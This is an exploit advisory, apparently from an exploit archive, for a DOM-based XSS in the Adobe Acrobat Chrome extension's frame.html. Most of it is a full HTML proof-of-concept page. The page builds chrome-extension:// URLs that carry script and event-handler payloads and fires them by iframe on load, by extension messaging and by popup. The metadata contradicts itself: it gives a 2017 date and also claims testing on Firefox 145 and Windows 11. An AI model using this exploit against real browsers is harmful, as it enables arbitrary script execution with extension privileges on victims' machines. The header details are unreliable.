=============================================================================================================================================
| # Title     : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit                                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj                         |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212491/ 

[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
              DOM-based XSS condition. Malicious payloads are executed inside the extension context.

[+] Date: January 2017

    Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)

    Type: DOM-based Cross-Site Scripting (XSS)

    Users Affected: ~30 million installations (via forced auto-update)
	
[+] Technical Details:

The extension receives JSON data and renders dynamic HTML without 
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.

[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing browser Same Origin Policy and triggering 
extension-level privileges.

[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.

Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.

Save Instructions:
Code below should be saved in `poc.html` and opened locally.

Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.

[+]  POC :	

<!DOCTYPE html>
<html>
<head>
    <title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
    <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
    
    <div id="exploit-container"></div>
    
    <script>
    // Extension ID and vulnerable page
    const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
    const VULNERABLE_PAGE = 'data/js/frame.html';
    
    function createExploit() {
        // Advanced XSS payload with multiple vectors
        const payload = {
            panel_op: "status",
            current_status: "failure",
            message: `
                <div style="background:red;color:white;padding:20px;">
                    <h1>XSS EXECUTED</h1>
                    <p>Domain: <script>document.write(document.domain)</script></p>
                    <svg/onload="alert('POC By Indoushka: ' + location.href)">
                </div>
                <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
            `.replace(/\n/g, ' ').trim()
        };
        
        // URL encode the payload
        const encodedPayload = encodeURIComponent(JSON.stringify(payload));
        const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
        
        return exploitUrl;
    }
    
    function executeExploit() {
        const exploitUrl = createExploit();
        
        // Method 1: Try with iframe sandbox bypass
        const iframe = document.createElement('iframe');
        iframe.sandbox = 'allow-scripts allow-same-origin';
        iframe.src = exploitUrl;
        iframe.style.width = "500px";
        iframe.style.height = "400px";
        iframe.style.border = "3px solid red";
        
        document.getElementById('exploit-container').appendChild(iframe);
        
        console.log('Exploit URL:', exploitUrl);
        
        // Method 2: Try to trigger via extension messaging
        setTimeout(() => {
            try {
                // Try to communicate with the extension
                chrome.runtime.sendMessage(EXTENSION_ID, { 
                    type: 'trefoil_html_convert',
                    data: payload 
                }, response => {
                    console.log('Extension response:', response);
                });
            } catch(e) {
                console.log('Direct messaging failed:', e.message);
            }
        }, 1000);
        
        // Method 3: Create a popup with user gesture
        document.body.onclick = function() {
            window.open(exploitUrl, '_blank', 'width=600,height=400');
        };
    }
    
    // Execute exploit after page load
    window.onload = executeExploit;
    
    // Alternative: Use button with user gesture
    document.body.innerHTML += `
        <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
            Click to Trigger Exploit (User Gesture Required)
        </button>
    `;
    </script>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================